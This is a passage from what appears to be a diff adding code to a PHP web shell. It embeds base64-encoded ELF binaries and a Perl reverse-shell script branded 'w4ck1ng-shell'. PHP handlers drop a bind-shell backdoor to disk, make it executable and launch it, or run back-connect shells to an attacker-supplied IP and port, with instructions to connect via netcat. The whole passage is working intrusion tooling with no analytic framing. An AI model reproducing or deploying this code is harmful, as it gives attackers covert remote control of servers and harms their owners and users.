AEgAMAMYBAAAAAAAA3QAAABIAAADjAQAALJkECAAAAAAQAvH/9AEAAAAAAAA6AAAAEgAAAAQCAAAAAAAAqgEAABIAAAAWAgAAWJoECAAAAAAgABYAIQIAANCIBAgAAAAAEgANACcCAAAsmQQIAAAAABAC8f87AgAAAAAAADYAAAASAAAATAIAAAAAAADZAAAAEgAAAFwCAAAAAAAAKAAAABIAAABsAgAAZJoECAAAAAAQAPH/cwIAAAyaBAgAAAAAEQAVAIkCAABomgQIAAAAABAA8f+OAgAAAAAAAA4AAAASAAAAnwIAAAAAAAB4AAAAEgAAALICAAAsmQQIAAAAABAC8f/FAgAA8IgECAQAAAARAA4A1AIAAFiaBAgAAAAAEAAWAOECAAAAAAAAOQAAABIAAADzAgAAAAAAAAAAAAAgAAAABwMAACyZBAgAAAAAEALx/x0DAAAAAAAAAAAAACAAAAAAY2FsbF9nbW9uX3N0YXJ0AGNydHN0dWZmLmMAX19DVE9SX0xJU1RfXwBfX0RUT1JfTElTVF9fAF9fSkNSX0xJU1RfXwBwLjAAY29tcGxldGVkLjEAX19kb19nbG9iYWxfZHRvcnNfYXV4AGZyYW1lX2R1bW15AF9fQ1RPUl9FTkRfXwBfX0RUT1JfRU5EX18AX19GUkFNRV9FTkRfXwBfX0pDUl9FTkRfXwBfX2RvX2dsb2JhbF9jdG9yc19hdXgAYmFjay5jAGV4ZWNsQEBHTElCQ18yLjAAX0RZTkFNSUMAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAX19maW5pX2FycmF5X2VuZABfX2Rzb19oYW5kbGUAX19saWJjX2NzdV9maW5pAHN5c3RlbUBAR0xJQkNfMi4wAF9pbml0AGRhZW1vbkBAR0xJQkNfMi4wAF9zdGFydABzdHJsZW5AQEdMSUJDXzIuMABfX2ZpbmlfYXJyYXlfc3RhcnQAX19saWJjX2NzdV9pbml0AGluZXRfYWRkckBAR0xJQkNfMi4wAF9fYnNzX3N0YXJ0AG1haW4AX19saWJjX3N0YXJ0X21haW5AQEdMSUJDXzIuMABfX2luaXRfYXJyYXlfZW5kAGR1cDJAQEdMSUJDXzIuMABzdHJjYXRAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AF9maW5pAF9fcHJlaW5pdF9hcnJheV9lbmQAYnplcm9AQEdMSUJDXzIuMABleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9UQUJMRV8AX2VuZABodG9uc0BAR0xJQkNfMi4wAGNvbm5lY3RAQEdMSUJDXzIuMABfX2luaXRfYXJyYXlfc3RhcnQAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19wcmVpbml0X2FycmF5X3N0YXJ0AF9fZ21vbl9zdGFydF9fAA==";
+$y6 = 'html';
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiOyc7DQokc3lzdGVtMT0gJ2VjaG8gImBpZGAiOyc7DQokc3lzdGVtMj0gJ2VjaG8gImBwd2RgIjsnOw0KJHN5c3RlbTM9ICdlY2hvICJgd2hvYW1pYEBgaG9zdG5hbWVgOn4gPiI7JzsNCiRzeXN0ZW00PSAnL2Jpbi9zaCc7DQokMD0kY21kOw0KJHRhcmdldD0kQVJHVlswXTsNCiRwb3J0PSRBUkdWWzFdOw0KJGlhZGRyPWluZXRfYXRvbigkdGFyZ2V0KSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHByb3RvPWdldHByb3RvYnluYW1lKCd0Y3AnKTsNCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERPVVQsICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsICI+JlNPQ0tFVCIpOw0KcHJpbnQgIlxuXG46OiB3NGNrMW5nLXNoZWxsIChQcml2YXRlIEJ1aWxkIHYwLjMpIHJldmVyc2Ugc2hlbGwgOjpcblxuIjsNCnByaW50ICJcblN5c3RlbSBJbmZvOiAiOyANCnN5c3RlbSgkc3lzdGVtKTsNCnByaW50ICJcbllvdXIgSUQ6ICI7IA0Kc3lzdGVtKCRzeXN0ZW0xKTsNCnByaW50ICJcbkN1cnJlbnQgRGlyZWN0b3J5OiAiOyANCnN5c3RlbSgkc3lzdGVtMik7DQpwcmludCAiXG4iOw0Kc3lzdGVtKCRzeXN0ZW0zKTsgc3lzdGVtKCRzeXN0ZW00KTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+
+$backdoor="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAoIUECDQAAAD4EgAAAAAAADQAIAAHACgAIgAfAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQIrAkAAKwJAAAFAAAAABAAAAEAAACsCQAArJkECKyZBAg0AQAAOAEAAAYAAAAAEAAAAgAAAMAJAADAmQQIwJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAAAAAAABEAAAATAAAAAAAAAAAAAAAQAAAAEQAAAAAAAAAAAAAACQAAAAgAAAAFAAAAAwAAAA0AAAAAAAAAAAAAAA8AAAAKAAAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAABAAAAAAAAAAcAAAALAAAAAAAAAAQAAAAMAAAADgAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC4AAAAAAAAAdQEAABIAAACgAAAAAAAAAHEAAAASAAAANAAAAAAAAADMAAAAEgAAAGoAAAAAAAAAWgAAABIAAABMAAAAAAAAAHgAAAASAAAAYwAAAAAAAAA5AAAAEgAAAFgAAAAAAAAAOQAAABIAAACOAAAAAAAAAOYAAAASAAAAOwAAAAAAAAA6AAAAEgAAAFMAAAAAAAAAOQAAABIAAAB1AAAAAAAAALkAAAASAAAAegAAAAAAAAArAAAAEgAAAEcAAAAAAAAAeAAAABIAAABvAAAAAAAAAA4AAAASAAAAfwAAAEiJBAgEAAAAEQAOAEAAAAAAAAAAOQAAABIAAAABAAAAAAAAAAAAAAAgAAAAFQAAAAAAAAAAAAAAIAAAAABfSnZfUmVnaXN0ZXJDbGFzc2VzAF9fZ21vbl9zdGFydF9fAGxpYmMuc28uNgBleGVjbABwZXJyb3IAZHVwMgBzb2NrZXQAc2VuZABhY2NlcHQAYmluZABzZXRzb2Nrb3B0AGxpc3RlbgBmb3JrAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABfX2xpYmNfc3RhcnRfbWFpbgBjbG9zZQBHTElCQ18yLjAAAAACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAQACAAAAAAAAAAEAAQAkAAAAEAAAAAAAAAAQaWkNAAACAKYAAAAAAAAAiJoECAYSAACYmgQIBwEAAJyaBAgHAgAAoJoECAcDAACkmgQIBwQAAKiaBAgHBQAArJoECAcGAACwmgQIBwcAALSaBAgHCAAAuJoECAcJAAC8mgQIBwoAAMCaBAgHCwAAxJoECAcMAADImgQIBw0AAMyaBAgHDgAA0JoECAcQAABVieWD7AjoMQEAAOiDAQAA6FsEAADJwwD/NZCaBAj/JZSaBAgAAAAA/yWYmgQIaAAAAADp4P////8lnJoECGgIAAAA6dD/////JaCaBAhoEAAAAOnA/////yWkmgQIaBgAAADpsP////8lqJoECGggAAAA6aD/////JayaBAhoKAAAAOmQ/////yWwmgQIaDAAAADpgP////8ltJoECGg4AAAA6XD/////JbiaBAhoQAAAAOlg/////yW8mgQIaEgAAADpUP////8lwJoECGhQAAAA6UD/////JcSaBAhoWAAAAOkw/////yXImgQIaGAAAADpIP////8lzJoECGhoAAAA6RD/////JdCaBAhocAAAAOkA////Me1eieGD5PBQVFJorYgECGhciAQIUVZoQIYECOhf////9JCQVYnlU+gbAAAAgcO/FAAAg+wEi4P8////hcB0Av/Qg8QEW13Dixwkw1WJ5YPsCIA94JoECAB0DOscg8AEo9yaBAj/0qHcmgQIixCF0nXrxgXgmgQIAcnDVYnlg+wIobyZBAiFwHQSuAAAAACFwHQJxwQkvJkECP/QycOQkFWJ5VeD7GSD5PC4AAAAAIPAD4PAD8HoBMHgBCnEx0XkAQAAAMdF+EyJBAjHRCQIAAAAAMdEJAQBAAAAxwQkAgAAAOgJ////iUXwg33wAHkYxwQkjIkECOg0/v//xwQkAQAAAOio/v//ZsdF1AIAx0XYAAAAAItFDIPABIsAiQQk6Jv+//8Pt8CJBCTosP7//2aJRdbHRCQQBAAAAI1F5IlEJAzHRCQIAgAAAMdEJAQBAAAAi0XwiQQk6BL+//+NRdTHRCQIEAAA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L2NydG4uUwAxLmMAX0RZTkFNSUMAX19maW5pX2FycmF5X2VuZABfX2ZpbmlfYXJyYXlfc3RhcnQAX19pbml0X2FycmF5X2VuZABfR0xPQkFMX09GRlNFVF9UQUJMRV8AX19pbml0X2FycmF5X3N0YXJ0AGV4ZWNsQEBHTElCQ18yLjAAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAZm9ya0BAR0xJQkNfMi4wAF9fZHNvX2hhbmRsZQBfX2xpYmNfY3N1X2ZpbmkAYWNjZXB0QEBHTElCQ18yLjAAX2luaXQAbGlzdGVuQEBHTElCQ18yLjAAc2V0c29ja29wdEBAR0xJQkNfMi4wAF9zdGFydABfX2xpYmNfY3N1X2luaXQAX19ic3Nfc3RhcnQAbWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4wAGR1cDJAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AGJpbmRAQEdMSUJDXzIuMABfZmluaQBleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfX2k2ODYuZ2V0X3BjX3RodW5rLmJ4AF9lbmQAc2VuZEBAR0xJQkNfMi4wAGh0b25zQEBHTElCQ18yLjAAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18A";
+
+function checkproxyhost(){
+$host = getenv("HTTP_HOST");
+$filename = '/tmp/.setan/xh';
+if (file_exists($filename)) {
+$_POST['proxyhostmsg']="</br></br><center><font color=green size=3><b>Success!</b></font></br></br><a href=$host:6543>$host:6543</a></br></br><b>Note:</b> If '$host' have a good firewall or IDS  installed on their server, it will probably catch this or stop it from ever opening a port and you won't be able to connect to this proxy.</br></br></center>";
+} else {
+$_POST['proxyhostmsg']="</br></br><center><font color=red size=3><b>Failed!</b></font></br></br><b>Note:</b> If for some reason we would not create and extract the need proxy files in '/tmp' this will make this fail.</br></br></center>";
+}
+}
+
+if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd"))
+{
+$ip = gethostbyname($_SERVER["HTTP_HOST"]);
+$por = $_POST['backconnectport'];
+if(is_writable(".")){
+cfb("shbd",$backdoor);
+ex("chmod 777 shbd");
+$cmd = "./shbd $por";
+exec("$cmd > /dev/null &");
+$scan = myshellexec("ps aux");
+if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
+$_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
+}else{
+cfb("/tmp/shbd",$backdoor);
+ex("chmod 777 /tmp/shbd");
+$cmd = "./tmp/shbd $por";
+exec("$cmd > /dev/null &");
+$scan = myshellexec("ps aux");
+if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
+$_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
+}
+}
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="Perl"))
+{
+if(is_writable(".")){
+cf("back",$back_connect);
+$p2=which("perl");
+$blah = ex($p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+$_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+if (file_exists("back")) { unlink("back"); }
+}else{
+cf("/tmp/back",$back_connect);
+$p2=which("perl");
+$blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+$_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+if (file_exists("/tmp/back")) { unlink("/tmp/back"); }
+}
+}
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="C"))
+{
+if(is_writable(".")){
+cf("backc",$back_connect_c);
+ex("chmod 777 backc");
+//$blah = ex("gcc back.c -o backc");
+$blah = ex("./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
